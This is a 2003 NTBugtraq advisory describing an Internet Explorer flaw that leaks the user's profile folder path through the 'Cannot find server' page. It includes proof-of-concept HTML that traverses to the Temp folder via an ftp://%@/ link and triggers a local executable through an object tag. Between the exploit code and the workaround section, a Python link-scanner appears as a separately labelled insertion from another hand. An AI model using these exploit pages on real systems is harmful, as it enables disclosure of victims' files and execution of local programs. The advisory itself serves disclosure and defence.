Microsoft Internet Explorer %USERPROFILE% Folder Disclosure Vulnerability
From: Eiji James Yoshida (ptrs-ejy_at_BP.IIJ4U.OR.JP)
Date: 06/05/03
Date: Fri, 6 Jun 2003 03:28:00 +0900
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Title:
~~~~~~~~~~~~~~~~~
Microsoft Internet Explorer %USERPROFILE% Folder Disclosure Vulnerability
[http://www.geocities.co.jp/SiliconValley/1667/advisory07e.html]
Date:
~~~~~~~~~~~~~~~~~
5 June 2003
Author:
~~~~~~~~~~~~~~~~~
Eiji James Yoshida [ptrs-ejy@bp.iij4u.or.jp]
Vulnerable:
~~~~~~~~~~~~~~~~~
Windows 2000 SP3 with Internet Explorer 6.0 SP1
Overview:
~~~~~~~~~~~~~~~~~
This vulnerability lets a remote attacker obtain the path of the %USERPROFILE% folder
without having to guess the target's user name.
Example: %USERPROFILE% = "C:\Documents and Settings\victim"
Details:
~~~~~~~~~~~~~~~~~
The vulnerability lies in the address of Internet Explorer's "Cannot find server" page.
That address is
"res://C:\WINNT\System32\shdoclc.dll/dnserror.htm#file://C:\Documents and Settings\%USERNAME%\Desktop\ftp:\\%@\"
and therefore embeds the path of the current user's profile folder.
For example, the exploit in "Georgi Guninski security advisory #9"
needs to know the path of "%TEMP%":
http://www.guninski.com/eml-desc.html
In his advisory, he is guessing the path of "%TEMP%", and guessing that path
requires knowing a user name.
In such a case, the vulnerability which I found is useful, since
"%TEMP%" = "%USERPROFILE%\Local Settings\TEMP"
<a href="ftp://%@/../../../../LOCALS~1/TEMP/" TYPE="text/html">Exploit</a>
If an intruder can place a malicious file in the "%TEMP%" directory,
the vulnerability can be used to open that file:
<a href="ftp://%@/../../../../LOCALS~1/TEMP/malicious_file">Exploit</a>
Exploit code:
~~~~~~~~~~~~~~~~~
**************************************************
This exploit reads %TEMP%\exploit.html, which you need to create first.
Then click the "Exploit" link in ftpexp.html.
**************************************************
[exploit.html]
<html>
<script>setTimeout(function(){document.body.innerHTML='<object classid="clsid:11111111-1111-1111-1111-111111111111" codebase="file://c:/winnt/notepad.exe"></object>'}, 0);</script>
</html>
[ftpexp.html]
<html>
<a href="ftp://%@/../../../../Local Settings/Temp/exploit.html" TYPE="text/html" target="_blank">Exploit</a>
</html>
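As an added example (not part of the advisory or the author's code), here is a small Python check a content filter or incident responder could run over fetched HTML to flag anchors of the "ftp://%@/" form shown above, reporting how far each one traverses with ".." and which file under the profile it points at. The sample HTML is constructed from the advisory's ftpexp.html link plus two benign links.

```python
"""Flag anchors that use the ftp://%@/ trick from this advisory (added example)."""
from html.parser import HTMLParser
from urllib.parse import unquote

# Constructed sample: the advisory's ftpexp.html link plus two benign links.
SAMPLE_HTML = """<html>
<a href="http://example.invalid/page.html">news</a>
<a href="ftp://ftp.example.invalid/pub/file.zip">download</a>
<a href="ftp://%@/../../../../Local Settings/Temp/exploit.html" TYPE="text/html" target="_blank">Exploit</a>
</html>"""

PREFIX = "ftp://%@/"  # the host-less ftp URL form the advisory abuses


class _LinkCollector(HTMLParser):
    """Collect every href value from <a> tags (HTMLParser lowercases names)."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.hrefs.append(value)


def classify_href(href):
    """Return a finding dict if href uses the ftp://%@/ trick, else None."""
    h = unquote(href.strip())  # undo percent-encoding that might hide the pattern
    if not h.lower().startswith(PREFIX):
        return None
    segments = [s for s in h[len(PREFIX):].split("/") if s]
    traversal = sum(1 for s in segments if s == "..")
    target = "/".join(s for s in segments if s != "..")
    return {"href": href, "traversal_depth": traversal, "target": target}


def find_suspicious_links(html_text):
    """Scan HTML and return one finding per anchor that matches the pattern."""
    parser = _LinkCollector()
    parser.feed(html_text)
    return [f for f in (classify_href(h) for h in parser.hrefs) if f]


if __name__ == "__main__":
    for finding in find_suspicious_links(SAMPLE_HTML):
        print(finding)
```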
Workaround:
~~~~~~~~~~~~~~~~~
None.
Vendor Status:
~~~~~~~~~~~~~~~~~
Microsoft was notified on 7 November 2002.
A patch will be released to fix this bug in the future.
------------------------------------------------------
Eiji "James" Yoshida
penetration technique research site
E-mail: ptrs-ejy@bp.iij4u.or.jp
URL: http://www.geocities.co.jp/SiliconValley/1667/index.htm
------------------------------------------------------